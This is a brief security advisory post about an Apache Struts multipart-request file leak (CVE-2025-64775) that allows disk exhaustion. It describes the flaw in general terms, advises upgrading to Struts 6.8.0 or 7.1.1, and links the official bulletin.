Apache Struts Denial of Service Vulnerability Allows Disk Exhaustion Attacks (CVE-2025-64775)

The Apache Software Foundation disclosed a denial of service vulnerability in Apache Struts on December 1, 2025 (updated December 10). The flaw (CVE-2025-64775 and related CVE-2025-66675) allows attackers to exhaust server disk space through file leaks in multipart request processing.

Details of the Vulnerability

The issue is a file leak in the multipart request handler, where temporary files from form fields are not properly cleaned up. Repeated requests can fill the disk, crashing the application or server.

Impact and Recommendations

  • Causes disk exhaustion and denial of service
  • Affects file upload-enabled applications
  • No authentication required for exploitation
  • Upgrade to Apache Struts 6.8.0 or 7.1.1 immediately

Temporary files from regular form fields in multipart requests are not deleted, leading to rapid disk consumption. — Apache Struts Security Bulletin S2-068

Source and full details:

Read the official Apache Struts security bulletin here:

https://struts.apache.org/announce-2025.html

    Comments are closed